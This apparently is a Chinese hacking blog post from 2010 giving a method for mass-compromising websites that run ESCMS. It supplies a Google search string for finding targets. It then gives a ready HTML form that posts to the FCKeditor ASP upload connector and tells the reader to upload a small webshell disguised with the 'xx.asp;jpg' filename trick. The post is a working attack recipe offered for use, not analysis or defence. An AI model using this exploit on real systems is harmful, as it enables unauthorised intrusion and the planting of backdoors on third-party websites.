久久久电脑学习|渗透|注射|备忘|资料|收集|网文|入侵|注入|工作室|久久久电脑工作室|久久久|st999|电脑|电脑工作室|久久久电脑| - Powered by Sablog-X

浏览模式: 标准 | 列表Tag:批量

再发个批量拿站的方法

Submitted by admin

2010, February 25, 4:17 PM

是ESCMS程序的

GOOGLE搜索 intext:©2009-2010 ESCMS

利用的漏洞是fckeditor，，，呵呵，fckeditor可真的是帮了广大黑友的大忙了。。。

<form id="frmUpload" enctype="multipart/form-data" action="http://www.st999.cn/fckeditor/editor/filemanager/connectors/asp/upload.asp?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

存为html，上传xx.asp;jpg格式小马就可以了。。。

Tags: 批量

原创笔记 | 评论:0 | Trackbacks:0 | 阅读:12123

注册 | 登陆

网名：流浪的风，QQ：470032103，安全交流群：36799078;本博客为个人笔记之地，不喜勿入；有类似helen心理的，请勿加群！

日志分类

热门标签

discuz [23]
dedecms [20]
oday [18]
ecshop [18]
phpcms [15]
上传 [13]
网趣 [11]
dede [9]
注入 [8]
shopxp [7]
shopex [7]
无忧 [6]
ewebeditor [6]
dvbbs [6]
mssql [6]

搜索文章

最新评论

博客信息

分类数量: 18
文章数量: 468
评论数量: 7
标签数量: 254
附件数量: 492
引用数量: 0
注册用户: 1
今日访问: 230
总访问量: 3666270
程序版本: 1.6

51.la

{title}